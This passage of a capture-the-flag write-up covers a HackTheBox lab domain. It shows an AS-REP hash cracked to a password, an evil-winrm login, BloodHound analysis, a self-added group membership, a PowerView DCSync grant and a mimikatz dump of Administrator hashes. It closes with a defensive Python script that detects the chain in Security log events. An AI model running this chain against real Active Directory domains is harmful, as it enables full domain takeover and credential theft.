Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:e1f287c1c6364d...2eaf89
Time.Started.....: Tue May 5 11:16:34 2026, (2 secs)
Time.Estimated...: Tue May 5 11:16:36 2026, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 1896.9 kH/s (0.80ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4083712/14344385 (28.47%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: s523480 -> s3r3ndipit
Started: Tue May 5 11:16:25 2026
Stopped: Tue May 5 11:16:37 2026
We were able to crack the hash, so now we have our initial credentials, svc-alfresco:s3rvice. Let's try to get onto the host with evil-winrm.
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ evil-winrm -i 10.129.29.48 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
I was able to launch evil-winrm successfully with the credentials.
User and Domain Enumeration from the Domain-joined Host
*Evil-WinRM* PS C:\Users> net users
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark santi sebastien
SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users> reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x5ea4c0cd
ShutdownFlags REG_DWORD 0x80000033
DisableLockWorkstation REG_DWORD 0x0
DefaultDomainName REG_SZ HTB
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\AlternateShells
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\GPExtensions
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\VolatileUserMgrKey
*Evil-WinRM* PS C:\Users>
To better visualize the domain, let's use BloodHound for the domain enumeration; it helps us see the paths and relationships in a graphical view.
To use BloodHound you need a collector, so I uploaded SharpHound to collect the domain info, since evil-winrm has an upload and download feature.
Checking the user's groups manually with whoami /groups and with BloodHound, I see that the user is part of the Account Operators group, which means the user can create, modify, and delete most user accounts, groups, and computer objects within the domain.
Bloodhound
This means that with the current user's permissions, we can:
- Change a user's group membership
- Add a user, including ourselves, to a group
- Create a new user
Now let's check the shortest path to Domain Admins in BloodHound.
The Exchange Windows Permissions group became interesting. When I searched for it on the web, it turned out that:
- Members of this group are granted WriteDACL access on the domain object.
This means that if we are part of this group, we can grant ourselves DCSync rights.
Remember, we are already in Account Operators, the group that lets us add a user to a group.
So let's go ahead and add ourselves to the Exchange Windows Permissions group, but first let's upload PowerView.
Let's add our current user, svc-alfresco, to the Exchange Windows Permissions group with the command below:
net group "Exchange Windows Permissions" svc-alfresco /add
Now let's grant ourselves DCSync rights with the PowerView command below:
Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "svc-alfresco" -Rights DCSync
Once the command above runs successfully, let's upload mimikatz to the target to perform the secrets dump. With mimikatz uploaded to the host, let's run the command below to dump the Administrator hash:
.\mimikatz.exe 'lsadump::dcsync /domain:HTB.LOCAL /user:administrator' exit
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\mimikatz.exe 'lsadump::dcsync /domain:HTB.LOCAL /user:administrator' exit
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:HTB.LOCAL /user:administrator
[DC] 'HTB.LOCAL' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : Administrator@htb.local
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 8/30/2021 5:51:58 PM
Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID : 500
Credentials:
Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6
ntlm- 0: 32693b11e6aa90eb43d32c72a07ceea6
ntlm- 1: 9307ee5abf7791f3424d9d5148b20177
ntlm- 2: 32693b11e6aa90eb43d32c72a07ceea6
lm - 0: 9498c81fd53411e023fcd1ff4cd3e482
lm - 1: f505fe58b1dedbe3015454d212af5115
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : cad4a87763ba795c795b96486148bb95
* Primary:Kerberos-Newer-Keys *
Default Salt : HTB.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
aes128_hmac (4096) : b5880b186249a067a5f6b814a23ed375
des_cbc_md5 (4096) : c1e049c71f57343b
OldCredentials
aes256_hmac (4096) : 44f53d59845f6fc874991dadd99efa2513ed4f1d26762c2130cb6af13c39d90a
aes128_hmac (4096) : 08f52532321ad13ccb9f2dc613aac29d
des_cbc_md5 (4096) : 977a57459e191a98
* Primary:Kerberos *
Default Salt : HTB.LOCALAdministrator
Credentials
des_cbc_md5 : c1e049c71f57343b
OldCredentials
des_cbc_md5 : 977a57459e191a98
* Packages *
NTLM-Strong-NTOWF
mimikatz(commandline) # exit
Bye!
Yeeeeepee!!!! Our attack is successful: we have the Administrator hash now, so let's log in with evil-winrm using it.
Game over!!!! We own Domain Admin.
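From the defender's side, every step of that chain lands in the DC's Security log: the self-add to the group (4728/4732/4756 depending on group scope), the rewrite of the domain object's nTSecurityDescriptor (5136) and the replication request itself (4662 carrying the DS-Replication-Get-Changes GUIDs). The correlation below is an added example, not part of the original post; its events are constructed to mirror the chain with simplified field names, and it assumes the Directory Service Access/Changes audit subcategories and a SACL on the domain object are in place, since without them 4662 and 5136 never appear.

```python
import re
from datetime import datetime, timedelta

# Extended-rights GUIDs a DCSync (DRSGetNCChanges) needs; fixed values from the AD schema.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Member-added events for global (4728), domain-local (4732) and universal (4756) security groups.
GROUP_ADD_EVENTS = {4728, 4732, 4756}
WINDOW = timedelta(hours=2)   # how far back to look for the earlier stages

# Constructed sample events (not real logs from the box), mirroring the chain in the writeup.
EVENTS = [
    {"time": "2026-05-05T11:40:02", "id": 4756, "subject": "svc-alfresco",
     "member": "svc-alfresco", "group": "Exchange Windows Permissions"},
    {"time": "2026-05-05T11:41:10", "id": 5136, "subject": "svc-alfresco",
     "object": "DC=htb,DC=local", "attribute": "nTSecurityDescriptor"},
    {"time": "2026-05-05T11:43:55", "id": 4662, "subject": "svc-alfresco",
     "object": "DC=htb,DC=local",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A domain controller's own machine account replicating is normal and must not alert.
    {"time": "2026-05-05T11:50:00", "id": 4662, "subject": "FOREST$",
     "object": "DC=htb,DC=local",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}")


def ts(ev):
    return datetime.fromisoformat(ev["time"])


def is_machine_account(name):
    return name.endswith("$")


def replication_requests(events):
    """4662 events whose Properties carry a replication GUID, excluding DC machine accounts."""
    hits = []
    for ev in events:
        if ev["id"] != 4662 or is_machine_account(ev["subject"]):
            continue
        rights = [REPL_GUIDS[g] for g in GUID_RE.findall(ev["properties"].lower())
                  if g in REPL_GUIDS]
        if rights:
            hits.append((ev, rights))
    return hits


def self_adds_to_group(events):
    """Group-membership changes where the actor added their own account."""
    return [ev for ev in events
            if ev["id"] in GROUP_ADD_EVENTS and ev["subject"].lower() == ev["member"].lower()]


def domain_dacl_changes(events):
    """5136 events that rewrote the security descriptor of a naming context (the domain object)."""
    return [ev for ev in events
            if ev["id"] == 5136 and ev["attribute"] == "nTSecurityDescriptor"
            and ev["object"].upper().startswith("DC=")]


def correlate(events):
    """Map each non-DC principal that replicated to the earlier stages it performed within WINDOW."""
    findings = {}
    for rep, rights in replication_requests(events):
        who, when = rep["subject"], ts(rep)

        def recent(ev):
            return ev["subject"] == who and timedelta(0) <= when - ts(ev) <= WINDOW

        chain = [f"GROUP_ADD:{ev['group']}" for ev in self_adds_to_group(events) if recent(ev)]
        chain += [f"DACL_CHANGE:{ev['object']}" for ev in domain_dacl_changes(events) if recent(ev)]
        chain.append("DCSYNC:" + ",".join(rights))
        findings[who] = chain
    return findings


if __name__ == "__main__":
    for who, chain in correlate(EVENTS).items():
        print(f"[!] {who}: " + " -> ".join(chain))
```

A lone 4662 with these GUIDs from a non-DC account is already worth an alert; the preceding self-add and DACL rewrite by the same account turn it into a high-confidence finding rather than a noisy one.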